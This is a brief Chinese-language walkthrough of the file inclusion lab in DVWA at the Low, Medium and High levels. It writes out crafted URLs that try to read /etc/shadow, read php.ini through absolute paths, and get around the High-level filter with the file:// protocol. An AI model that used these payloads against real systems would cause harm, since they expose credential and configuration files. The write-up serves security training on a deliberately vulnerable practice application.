参考网站:
https://www.freebuf.com/articles/web/119150.html
LOW
点击file1.php,显示如下

漏洞利用
本地文件包含
构造url
http://localhost:8080/DVWA/vulnerabilities/fi/?page=/etc/shadow
报错,显示没有这个文件。
构造url(绝对路径)
http://localhost:8080/DVWA/vulnerabilities/fi/?page=D:\PHPTutorial\WWW\DVWA\php.ini
成功读取服务器的php.ini文件
通过以下路径可打开file1
http://localhost:8080/DVWA/vulnerabilities/fi/?page=D:\PHPTutorial\WWW\DVWA\vulnerabilities\fi\file1.php
Medium
漏洞利用
本地文件包含
绝对路径不受任何影响,读取成功
High
漏洞利用
用浏览器打开一个本地文件时,用的是file协议,如下图。
构造url
http://localhost:8080/DVWA/vulnerabilities/fi/?page=file:\\D:\PHPTutorial\WWW\DVWA\vulnerabilities\fi\file1.php
成功读取了服务器的配置文件